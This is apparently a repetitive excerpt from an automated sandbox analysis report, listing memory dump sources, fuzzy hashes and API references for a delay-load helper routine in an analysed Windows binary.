                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: d32d7f667efa6b853122270a2782d4c44f48236f13edbffc56284a0d3bf444ea
                                                          • Instruction ID: 696729211e260aa2d4dbf1d7d41486416db2e5cf7ba1f05f3ee68be853caaadc
                                                          • Opcode Fuzzy Hash: d32d7f667efa6b853122270a2782d4c44f48236f13edbffc56284a0d3bf444ea
                                                          • Instruction Fuzzy Hash: CCB012E23590C27C310451055F03F77124DD2C0B20331C01EF508D50C0D8445C0A3873
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 824f6c92600eface529be1126cc110861367132adeec3862b5d87eb4ab7088de
                                                          • Instruction ID: f4b212a0afd90f209ee22b1425d645ee94e71a7f3267f7031def28c2dcb717c8
                                                          • Opcode Fuzzy Hash: 824f6c92600eface529be1126cc110861367132adeec3862b5d87eb4ab7088de
                                                          • Instruction Fuzzy Hash: EEB012C36691427C304451559E03F37212CD1C0B20334461EF808C50C0E8484C513572
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 27af892386ccfb7831de7ca6ea22fbf658f2b92dfa551c057ca798360584c063
                                                          • Instruction ID: 784859ba1487d3c90ca0b586fa5e132422ad93df1c949cafe03bc499accab792
                                                          • Opcode Fuzzy Hash: 27af892386ccfb7831de7ca6ea22fbf658f2b92dfa551c057ca798360584c063
                                                          • Instruction Fuzzy Hash: 56B012C36A90427C300451559F03F37212CD1C0B20334461EF408C50C0EC484C123572
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE580
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 7c0dd1d5f190e0cd313942718c3471b83ed2762b83c567e40bad8b6dcb177dda
                                                          • Instruction ID: f904d780cd2c0db141a68ef173852d65e8c51d115e931549bf1e1bf19e9c6e24
                                                          • Opcode Fuzzy Hash: 7c0dd1d5f190e0cd313942718c3471b83ed2762b83c567e40bad8b6dcb177dda
                                                          • Instruction Fuzzy Hash: 97B012C36690427D300451555E03F37111CE1C0B20330441EF408C50C0E8484C113572
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 433a3a298aaf3f18e91df2fc87c8cd377e2fcf45c04e601f601fbf51af0bc887
                                                          • Instruction ID: 2f9abc4025442bc0a7da31ac7759c65071cb48ae930002c137e15f8b11fad761
                                                          • Opcode Fuzzy Hash: 433a3a298aaf3f18e91df2fc87c8cd377e2fcf45c04e601f601fbf51af0bc887
                                                          • Instruction Fuzzy Hash: 7EB012C26592427C310452099E03F3B254CD1C1F20330461EF488C40C4E8445C453872
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0855923f8d4b796fa9d8ac89e8e9b477b82654c7451b134749eb204b23b16fe7
                                                          • Instruction ID: ce1dec96cf585f7a2c71ca6868537a2f353069ef4f3c10153112af576724a5b2
                                                          • Opcode Fuzzy Hash: 0855923f8d4b796fa9d8ac89e8e9b477b82654c7451b134749eb204b23b16fe7
                                                          • Instruction Fuzzy Hash: E8B012C2A591427D300492095E03F3B114CE1C1F20330441EF448C40C4E8444C013872
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: af44ee74e2b08a73cb0e14128adc7d97687ea17bab2fa1b512e0ff8112deeda9
                                                          • Instruction ID: 42271c6e30e01fbbd073573dd548029cb65648168360dcd0041f3802078372c4
                                                          • Opcode Fuzzy Hash: af44ee74e2b08a73cb0e14128adc7d97687ea17bab2fa1b512e0ff8112deeda9
                                                          • Instruction Fuzzy Hash: B4B012C2A591827C300452095F03F3B154CD1C1F20330841EF448C40C4E8444C023872
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE51F
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: ac132c50e2f38caf9024064237ef1a9323e760519129942dbca70aff3d309cde
                                                          • Instruction ID: 84d5a068774daa2b7fc6f56faf1404557690a3f98f9ac609334d03580b0851cd
                                                          • Opcode Fuzzy Hash: ac132c50e2f38caf9024064237ef1a9323e760519129942dbca70aff3d309cde
                                                          • Instruction Fuzzy Hash: 57B012C26591427C300452255E07F3B110CE1C1F24330442EF498C44C6E8444C053872
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 9a5b7411abfab761456765c4266c72f373e34ca3950af1b8832858c084b66f18
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 9a5b7411abfab761456765c4266c72f373e34ca3950af1b8832858c084b66f18
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: a511e136b46ef5a2c63e8b378adbdf38799656e6330a2892299f7f7287ac9414
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: a511e136b46ef5a2c63e8b378adbdf38799656e6330a2892299f7f7287ac9414
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: b6a150ca4b36d1aaf865c312287606263b86e68e9fa3e0d9d47bfba852c672fa
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: b6a150ca4b36d1aaf865c312287606263b86e68e9fa3e0d9d47bfba852c672fa
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: eb4ef26f697e03541fd450d90f7c16a9ec904731510009fe55cefd9fc0a4f47f
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: eb4ef26f697e03541fd450d90f7c16a9ec904731510009fe55cefd9fc0a4f47f
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 0a4d682a0e489d6962c88b842fe9bab7a5fe84b371c993a3de0bb9609b86cb53
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 0a4d682a0e489d6962c88b842fe9bab7a5fe84b371c993a3de0bb9609b86cb53
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 3c166f0c043a34c8858a6a0849dcddd0729bea73d03b6c11e07cc9737e936ffd
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 3c166f0c043a34c8858a6a0849dcddd0729bea73d03b6c11e07cc9737e936ffd
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: f90d0a79c2b8f42bb6e3d983fb54841dbc492e226fe1e12073a11906055fc7a1
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: f90d0a79c2b8f42bb6e3d983fb54841dbc492e226fe1e12073a11906055fc7a1
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                          • Associated: 00000000.00000002.1652408775.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652455470.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FEE000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000000FF5000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652473435.0000000001012000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1652531245.0000000001013000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_fb0000_cuAvoExY41.jbxd
                                                          Similarity
                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                          • String ID:
                                                          • API String ID: 1269201914-0
                                                          • Opcode ID: 5afce2b7d672a3878be0500da61e028c669a34f6cf53508aecc8cecf914daee2
                                                          • Instruction ID: 92d0973d3095b3fda58499676b75ae74f401827ce42782a297b193a151b52ff8
                                                          • Opcode Fuzzy Hash: 5afce2b7d672a3878be0500da61e028c669a34f6cf53508aecc8cecf914daee2
                                                          • Instruction Fuzzy Hash: 82A002D6559143BC310951525F07E37111DC5C5B51334452DF816C44C1585479553871
                                                          APIs
                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 00FCE1E3
                                                            • Part of subcall function 00FCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00FCE8D0
                                                            • Part of subcall function 00FCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00FCE8E1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1652425868.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
